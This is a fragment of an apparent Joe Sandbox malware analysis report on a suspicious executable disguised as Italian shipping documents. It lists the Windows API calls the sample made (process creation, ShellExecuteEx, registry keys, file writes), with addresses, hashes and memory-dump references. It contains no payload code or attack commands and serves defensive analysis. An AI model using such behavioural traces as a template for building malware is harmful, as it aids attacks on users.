                                        • Opcode Fuzzy Hash: ac608fdb2779203a5befd5ae41b504f19679aceccba4adcfaa0019147e4ceade
                                        • Instruction Fuzzy Hash: 82F06832A04510ABDB00BBA89A4D9EE62A5AF54314F11443FE502B71C1CAFC5D02966D
                                        APIs
                                        • CreateDirectoryW.KERNELBASE(00437800,?), ref: 00405AED
                                        • GetLastError.KERNEL32 ref: 00405AFB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: CreateDirectoryErrorLast
                                        • String ID:
                                        • API String ID: 1375471231-0
                                        • Opcode ID: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                        • Instruction ID: ed7a645988c2e2a06802fdc928ba12763e2e88a5fcf473fdfb2f1107ef0c66eb
                                        • Opcode Fuzzy Hash: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                        • Instruction Fuzzy Hash: 56F0F970D0060DDBDB00CFA4C5497DFBBB4AB04305F00812AD545B6281D7B95248CBA9
                                        APIs
                                        • CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
                                        • CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: CloseCreateHandleProcess
                                        • String ID:
                                        • API String ID: 3712363035-0
                                        • Opcode ID: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
                                        • Instruction ID: b1032d8704f3223f2a9afbe03a7757fefc60a77e8ecf1711bb84520e71ece662
                                        • Opcode Fuzzy Hash: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
                                        • Instruction Fuzzy Hash: 91E09AB4600219BFEB109B74AD06F7B767CE704604F408475BD15E2151D774A8158A78
                                        APIs
                                        • GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00406978
                                          • Part of subcall function 004068DB: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
                                          • Part of subcall function 004068DB: wsprintfW.USER32 ref: 0040692D
                                          • Part of subcall function 004068DB: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406941
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                        • String ID:
                                        • API String ID: 2547128583-0
                                        • Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                        • Instruction ID: ff64ee7455e026c1647d72c339307a336527f79dacb59e64982fca04d7429b22
                                        • Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                        • Instruction Fuzzy Hash: 38E08673504210AFD61057705D04D27B3A89F85740302443EF946F2140DB34DC32ABA9
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe,80000000,00000003), ref: 0040604B
                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: File$AttributesCreate
                                        • String ID:
                                        • API String ID: 415043291-0
                                        • Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                        • Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
                                        • Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                        • Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?,?,00405C27,?,?,00000000,00405DFD,?,?,?,?), ref: 00406027
                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 0040603B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                        • Instruction ID: 97cbb32404f08d1f6fed837f871d2b37f55cf766f9720be9b575451f5cdabe77
                                        • Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                        • Instruction Fuzzy Hash: A3D0C972504220AFC2102728AE0889BBB55EB542717028A35FCA9A22B0CB304CA68694
                                        APIs
                                        • CreateDirectoryW.KERNELBASE(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B
                                        • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B19
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: CreateDirectoryErrorLast
                                        • String ID:
                                        • API String ID: 1375471231-0
                                        • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                        • Instruction ID: 8c4969e502f5bc4c8dfdefb7e9c2ba363b64d1215f12130c86bef4ebeef6f559
                                        • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                        • Instruction Fuzzy Hash: 19C08C30310902DACA802B209F087173960AB80340F158439A683E00B4CA30A065C92D
                                        APIs
                                        • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 0040174E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: PathSearch
                                        • String ID:
                                        • API String ID: 2203818243-0
                                        • Opcode ID: d808a61f5ad900bf7ed85ac91a182ba8082c891450206748c020b13630da23e4
                                        • Instruction ID: 361b5ea4dce5ff5b5c0a009366d47470cb0510696b1a56dfa9010847a1c89de2
                                        • Opcode Fuzzy Hash: d808a61f5ad900bf7ed85ac91a182ba8082c891450206748c020b13630da23e4
                                        • Instruction Fuzzy Hash: 21E08071204104ABE700DB64DD49EAE77BCDF5036CF20553BE511E60D1E7B45905971D
                                        APIs
                                        • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E5C,00000000,?,?), ref: 0040641B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                        • Instruction ID: 64249f1610b479570df181ce2e9e182bf10c6facee3c5f7fb09e5bef7ea49c41
                                        • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                        • Instruction Fuzzy Hash: E6E0E672010109BFEF095F90DD4AD7B7B1DE708310F11492EF906D5051E6B5E9305674
                                        APIs
                                        • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E7,00000000,00000000,0040330B,000000FF,00000004,00000000,00000000,00000000), ref: 004060DE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                        • Instruction ID: a77d82ba430c16999eb1f2306cb11816df14181100402a9e04059793f1b3015d
                                        • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                        • Instruction Fuzzy Hash: 21E08632150219ABCF10DF948C00EEB3B9CFF04390F018436FD11E3040D630E92197A4
                                        APIs
                                        • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040349D,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 0040610D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: FileWrite
                                        • String ID:
                                        • API String ID: 3934441357-0
                                        • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                        • Instruction ID: 78408803ccc59d93ae5352641a5e7b8f709900c8df5e8e9e13d69f82a1dcf02f
                                        • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                        • Instruction Fuzzy Hash: 8FE08C3220021ABBCF109E908C00EEB3FACEB003A0F014432FA26E6050D670E83097A4
                                        APIs
                                        • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,00406452,?,?,?,?,Exec,?,00000000), ref: 004063E8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: Open
                                        • String ID:
                                        • API String ID: 71445658-0
                                        • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                        • Instruction ID: e31b8ecfa4924c4a0859a1c58e61cb12282203f41ec30ad4fda9f6d7c72ae418
                                        • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                        • Instruction Fuzzy Hash: 68D0123200020DBBDF115E91ED01FAB3B1DAB08310F014426FE16E5091D776D570A764
                                        APIs
                                        • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015B3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: e4d35ef24f86c86e365822f81ff15bb63714950be14a167d72dedfa96a9168d0
                                        • Instruction ID: b7b437a2ec26925c6232407c7e58ab903e49824199ec6a3f71ab3ccdd8f320e3
                                        • Opcode Fuzzy Hash: e4d35ef24f86c86e365822f81ff15bb63714950be14a167d72dedfa96a9168d0
                                        • Instruction Fuzzy Hash: 81D05B72B08104DBDB01DBE8EA48A9E73B4DB50338B21893BD111F11D0D7B8C545A71D
                                        APIs
                                        • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: 8dc2ea4a8cffd810c80330d43262312fa0f844130cc7d84a637c392e617d0b66
                                        • Instruction ID: 7d988476d572be30e71f68111afb2513933db934ea5b2002f3fecefde51a3b0c
                                        • Opcode Fuzzy Hash: 8dc2ea4a8cffd810c80330d43262312fa0f844130cc7d84a637c392e617d0b66
                                        • Instruction Fuzzy Hash: ACC04C717402007BDA209F50AD49F07775467A0702F1494797341E51E0C674E550D61C
                                        APIs
                                        • ShellExecuteExW.SHELL32(?), ref: 00405B8C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: ExecuteShell
                                        • String ID:
                                        • API String ID: 587946157-0
